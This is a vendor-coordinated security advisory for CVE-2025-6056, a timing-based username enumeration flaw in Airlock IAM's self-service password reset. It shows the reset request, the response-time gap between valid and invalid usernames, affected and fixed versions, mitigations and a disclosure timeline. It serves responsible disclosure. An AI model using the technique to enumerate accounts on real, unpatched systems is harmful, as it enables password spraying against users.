Security Advisory for Airlock IAM: Username Enumeration via Response Timing in the Password Reset Functionality

Jul 4, 2025 von Patrick Schlüter

During a penetration test of a client’s application using Airlock IAM, an identity and access management (IAM) solution developed by Ergon Informatik AG, the IAM was found to be vulnerable against a timing attack in the self-service password reset feature. The vulnerability was initially reported to the client by Redguard, who then disclosed it to the vendor. The customer then asked Redguard to initiate a responsible disclosure with the vendor. As a result of this process, the vulnerability was fixed by the vendor for all currently supported versions of Airlock IAM and verified by Redguard’s security testers.

Security Advisory for CVE-2025-6056

A timing difference in the self-service password reset feature allows distinguishing between whether a username is valid or not by performing a password reset with the given username and observing the server’s response time. The vulnerability was rated with a CVSS v4.0 score of 6.9 (Medium) and assigned CVE-2025-6056.

Technical Details

Airlock IAM allows users to configure custom password reset flows, so the exact steps in the flow may differ depending on a customer’s specific configuration. An example password reset flow can be found in the Airlock IAM documentation. In the tested client’s application, a similar flow was used. As documented in the example flow, the user is first prompted to enter their username. This username was sent to the server with the following HTTP request, where USERNAME is replaced with the actual username:

1
2
3
4
5
6
7
8
9
POST /auth/rest/public/self-service/username/identify HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
[...]
Content-Type: application/json
[...]

{"username":"USERNAME"}

To prevent username enumerations the response’s content to this request will always indicate a success, even for invalid usernames. However, the server’s response time to this request differed significantly, depending on whether a valid username was used in the request. For invalid usernames (no user with this username exists), the response time was around 30 to 40 milliseconds. For valid usernames the response time was much bigger with around 500 to 800 milliseconds. This timing discrepancy allows attackers to distinguish whether a given username is registered in the IAM or not.

If no additional anti-automation features like CAPTCHAs are in-place, attackers can perform automated username guessing attacks against the password reset form. This can allow them to create a list of valid usernames, which can be used in secondary attacks such as password spraying attacks.

Affected versions

This vulnerability was found in Airlock IAM 8.2.0. According to the vendor, the following versions of Airlock IAM are also vulnerable:

  • 7.7.9
  • 8.0.8
  • 8.1.7
  • 8.2.4
  • 8.3.1

The security testers assume that prior versions of the same Airlock minor version (such as 8.1.0 - 8.1.6) are also vulnerable, but did not explicitly verify it.

Fixed versions

The fix is listed as bugfix AI-19865 in the IAM changelogs. According to vendor information, the following versions of Airlock IAM are fixed:

  • 7.7.11
  • 8.0.9
  • 8.1.8
  • 8.2.5
  • 8.3.2

The fix has been verified by Redguard for Airlock IAM in version 8.4.1 only, since the customer updated to that specific version. Other versions however were not explicitly tested.

Suggested Mitigations and Countermeasures

It is recommended to upgrade Airlock IAM to one of the fixed versions. Should this not be possible, automated exploitation of the vulnerability can likely be made more difficult by enabling additional anti-automation measures such as CAPTCHAs for the password reset step where users enter their username.

Credits

  • Patrick Schlüter, Redguard AG

Timeline

In the following timeline, the customer refers to the company that tasked Redguard with a penetration test of their application and the vendor refers to the Airlock team.

  • 2024-09-06: Redguard reported the vulnerability to the customer
  • 2024-10-10: Customer reported the vulnerability to the vendor
  • 2024-10-14: The vendor confirmed the existence of the vulnerability
  • 2024-12-03: Redguard contacted the vendor to check on the current status of the vulnerability
  • 2024-12-09: Redguard contacted the vendor again due to no response
  • 2025-01-06: The vendor requested additional information about the vulnerability
  • 2025-01-13: The vendor asked again due to not receiving a response
  • 2025-01-21: Redguard provided the case number they got from the customer
  • 2025-01-21: The vendor replied with current status of the vulnerability
  • 2025-02-19: The vendor released fixed versions of Airlock IAM
  • 2025-02-19: Received permission from the customer to release an advisory after the vulnerability is fixed
  • 2025-06-05: Customer successfully updated to a fixed version of Airlock IAM
  • 2025-06-05: Redguard verified the fix on the customer’s application
  • 2025-06-12: Redguard contacted NCSC as CNA of Switzerland to request a CVE
  • 2025-06-13: Received permission from the vendor to release an advisory
  • 2025-07-04: Public disclosure of this advisory

Disclaimer

This document is not meant to be a complete list of security issues for any of the mentioned software and/or versions. It is possible, and indeed likely, that there are further security issues that are yet to be identified. The information in the advisory is believed to be accurate at the time of publishing, based on currently available information.

Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties regarding this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.


< zurück